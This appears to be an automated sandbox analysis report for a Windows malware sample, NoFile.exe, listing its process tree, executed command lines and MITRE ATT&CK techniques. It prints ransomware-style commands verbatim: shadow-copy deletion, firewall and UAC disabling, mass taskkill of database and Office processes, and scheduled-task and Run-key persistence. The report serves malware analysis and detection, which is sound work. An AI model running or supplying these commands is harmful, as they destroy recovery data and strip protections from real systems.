PID 3888 wrote to memory of 1276	3888	cmd.exe	schtasks.exe
PID 3436 wrote to memory of 536	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 536	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 536	3436	NoFile.exe	cmd.exe
PID 536 wrote to memory of 2868	536	cmd.exe	nslookup.exe
PID 536 wrote to memory of 2868	536	cmd.exe	nslookup.exe
PID 536 wrote to memory of 2868	536	cmd.exe	nslookup.exe
PID 3516 wrote to memory of 4052	3516	WScript.exe	cmd.exe
PID 3516 wrote to memory of 4052	3516	WScript.exe	cmd.exe
PID 3516 wrote to memory of 4052	3516	WScript.exe	cmd.exe
PID 3516 wrote to memory of 804	3516	WScript.exe	cmd.exe
PID 3516 wrote to memory of 804	3516	WScript.exe	cmd.exe
PID 3516 wrote to memory of 804	3516	WScript.exe	cmd.exe
PID 3436 wrote to memory of 3912	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3912	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3912	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 2628	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 2628	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 2628	3436	NoFile.exe	cmd.exe
PID 2628 wrote to memory of 3324	2628	cmd.exe	systeminfo.exe
PID 2628 wrote to memory of 3324	2628	cmd.exe	systeminfo.exe
PID 2628 wrote to memory of 3324	2628	cmd.exe	systeminfo.exe
PID 2628 wrote to memory of 1576	2628	cmd.exe	find.exe
PID 2628 wrote to memory of 1576	2628	cmd.exe	find.exe
PID 2628 wrote to memory of 1576	2628	cmd.exe	find.exe
PID 804 wrote to memory of 1556	804	cmd.exe	tasklist.exe
PID 804 wrote to memory of 1556	804	cmd.exe	tasklist.exe
PID 804 wrote to memory of 1556	804	cmd.exe	tasklist.exe
PID 804 wrote to memory of 3260	804	cmd.exe	find.exe
PID 804 wrote to memory of 3260	804	cmd.exe	find.exe
PID 804 wrote to memory of 3260	804	cmd.exe	find.exe
PID 804 wrote to memory of 3780	804	cmd.exe	timeout.exe
PID 804 wrote to memory of 3780	804	cmd.exe	timeout.exe
PID 804 wrote to memory of 3780	804	cmd.exe	timeout.exe
PID 3436 wrote to memory of 1004	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 1004	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 1004	3436	NoFile.exe	cmd.exe
PID 1004 wrote to memory of 616	1004	cmd.exe	systeminfo.exe
PID 1004 wrote to memory of 616	1004	cmd.exe	systeminfo.exe
PID 1004 wrote to memory of 616	1004	cmd.exe	systeminfo.exe
PID 1004 wrote to memory of 3796	1004	cmd.exe	find.exe

C:\Users\Admin\AppData\Local\Temp\NoFile.exe
"C:\Users\Admin\AppData\Local\Temp\NoFile.exe"
1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
2⤵
- Suspicious use of WriteProcessMemory
PID:3064

C:\Windows\SysWOW64\tasklist.exe
tasklist /v /fo csv
3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012

C:\Windows\SysWOW64\findstr.exe
findstr /i "dcdcf"
3⤵
PID:1952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ver
2⤵
PID:3484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3444

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
4⤵
PID:4052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\h4_svc.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:804

C:\Windows\SysWOW64\tasklist.exe
tasklist /v
5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\SysWOW64\find.exe
find /I /c "dcdcf"
5⤵
PID:3260

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:3780

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3532

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:3888

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1508

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:2388

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:3388

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:1780

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:228

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3680

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:4056

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:3084

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:2364

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:2572

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:3144

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1356

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:612

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:2984

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1588

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:1908

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:2868

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1932

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:2080

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:3468

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq NoFile.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:3912

C:\Windows\SysWOW64\find.exe
find /I "NoFile.exe"
5⤵
PID:3516

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:3500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3888

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
3⤵
- Creates scheduled task(s)
PID:1276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
2⤵
- Suspicious use of WriteProcessMemory
PID:536

C:\Windows\SysWOW64\nslookup.exe
nslookup myip.opendns.com. resolver1.opendns.com
3⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo %date%-%time%
2⤵
PID:3912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
2⤵
- Suspicious use of WriteProcessMemory
PID:2628

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
3⤵
- Gathers system information
PID:3324

C:\Windows\SysWOW64\find.exe
find /i "os name"
3⤵
PID:1576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
2⤵
- Suspicious use of WriteProcessMemory
PID:1004

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
3⤵
- Gathers system information
PID:616

C:\Windows\SysWOW64\find.exe
find /i "original"
3⤵
PID:3796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
2⤵
PID:1932

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- Modifies registry key
PID:3212

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2172

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
3⤵
PID:2872

C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode mode=disable
3⤵
PID:720

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
3⤵
PID:3692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
2⤵
PID:532

C:\Windows\SysWOW64\taskkill.exe
taskkill /im notepad.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3496

C:\Windows\SysWOW64\taskkill.exe
taskkill /im msftesql.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3076

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlagent.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3008

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlbrowser.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3516

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlwriter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3480

C:\Windows\SysWOW64\taskkill.exe
taskkill /im oracle.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:644

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocssd.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3004

C:\Windows\SysWOW64\taskkill.exe
taskkill /im dbsnmp.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3260

C:\Windows\SysWOW64\taskkill.exe
taskkill /im synctime.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\SysWOW64\taskkill.exe
taskkill /im agntsvc.exe
3⤵
- Kills process with taskkill
PID:796

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mydesktopqos.exe
3⤵
- Kills process with taskkill
PID:2760

C:\Windows\SysWOW64\taskkill.exe
taskkill /im isqlplussvc.exe
3⤵
- Kills process with taskkill
PID:1580

C:\Windows\SysWOW64\taskkill.exe
taskkill /im xfssvccon.exe
3⤵
- Kills process with taskkill
PID:3388

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mydesktopservice.exe
3⤵
- Kills process with taskkill
PID:3584

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocautoupds.exe
3⤵
- Kills process with taskkill
PID:2912

C:\Windows\SysWOW64\taskkill.exe
taskkill /im agntsvc.exe
3⤵
- Kills process with taskkill
PID:2872

C:\Windows\SysWOW64\taskkill.exe
taskkill /im encsvc.exe
3⤵
- Kills process with taskkill
PID:1276

C:\Windows\SysWOW64\taskkill.exe
taskkill /im firefoxconfig.exe
3⤵
- Kills process with taskkill
PID:3588

C:\Windows\SysWOW64\taskkill.exe
taskkill /im tbirdconfig.exe
3⤵
- Kills process with taskkill
PID:2572

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocomm.exe
3⤵
- Kills process with taskkill
PID:312

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld.exe
3⤵
- Kills process with taskkill
PID:632

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld-nt.exe
3⤵
- Kills process with taskkill
PID:1136

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld-opt.exe
3⤵
- Kills process with taskkill
PID:2944

C:\Windows\SysWOW64\taskkill.exe
taskkill /im dbeng50.exe
3⤵
- Kills process with taskkill
PID:2780

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqbcoreservice.exe
3⤵
- Kills process with taskkill
PID:1184

C:\Windows\SysWOW64\taskkill.exe
taskkill /im excel.exe
3⤵
- Kills process with taskkill
PID:2080

C:\Windows\SysWOW64\taskkill.exe
taskkill /im infopath.exe
3⤵
- Kills process with taskkill
PID:2180

C:\Windows\SysWOW64\taskkill.exe
taskkill /im msaccess.exe
3⤵
- Kills process with taskkill
PID:2968

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mspub.exe
3⤵
- Kills process with taskkill
PID:1668

C:\Windows\SysWOW64\taskkill.exe
taskkill /im onenote.exe
3⤵
- Kills process with taskkill
PID:3988

C:\Windows\SysWOW64\taskkill.exe
taskkill /im outlook.exe
3⤵
- Kills process with taskkill
PID:2708

C:\Windows\SysWOW64\taskkill.exe
taskkill /im powerpnt.exe
3⤵
- Kills process with taskkill
PID:1584

C:\Windows\SysWOW64\taskkill.exe
taskkill /im steam.exe
3⤵
- Kills process with taskkill
PID:2148

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thebat.exe
3⤵
- Kills process with taskkill
PID:2784

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thebat64.exe
3⤵
- Kills process with taskkill
PID:1556

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thunderbird.exe
3⤵
- Kills process with taskkill
PID:3936

C:\Windows\SysWOW64\taskkill.exe
taskkill /im visio.exe
3⤵
- Kills process with taskkill
PID:4068

C:\Windows\SysWOW64\taskkill.exe
taskkill /im winword.exe
3⤵
- Kills process with taskkill
PID:1260

C:\Windows\SysWOW64\taskkill.exe
taskkill /im wordpad.exe
3⤵
- Kills process with taskkill
PID:2064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
2⤵
PID:3428

C:\Windows\SysWOW64\reg.exe
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
3⤵
PID:2428

C:\Windows\SysWOW64\reg.exe
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
3⤵
- Modifies registry key
PID:1828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
2⤵
PID:720

C:\Windows\SysWOW64\reg.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:1128

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
3⤵
- Adds Run key to start application
PID:3588

C:\Windows\system32\MusNotifyIcon.exe
%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
1⤵
- Checks processor information in registry
PID:216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3312

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:832

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3896

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

3

T1112

File Deletion

T1107

Credential Access

Discovery

Query Registry

3

System Information Discovery

5

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery